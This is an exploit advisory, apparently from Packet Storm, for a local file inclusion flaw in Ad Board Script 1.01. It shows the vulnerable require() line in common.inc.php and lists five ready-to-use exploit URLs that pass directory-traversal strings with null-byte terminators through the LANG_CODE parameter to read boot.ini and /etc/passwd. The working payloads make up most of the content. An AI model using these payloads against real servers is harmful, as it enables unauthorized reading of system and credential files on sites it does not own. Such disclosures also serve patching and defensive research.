Ad Board Script version 1.01 suffers from a local file inclusion vulnerability.
573ee0b896a1a67faefcb26b281f3c713ccd089355781676c816c0a56de432ad#########################local file include#################
Author: ItSecTeam
download from:http://www.phpkobo.com/scripts/AF201_101/AF201_101.zip
script:Ad Board Script
Version:1.01
Updated:2010-01-10
dork::D
##########################################
vul:/path/web/codelib/cfg/common.inc.php line 21:
require( "res.{$LANG_CODE}.sys.inc.php" );
-----------------------------------------
xpl:/path/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
########################
discovered by ahmadbady
########################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed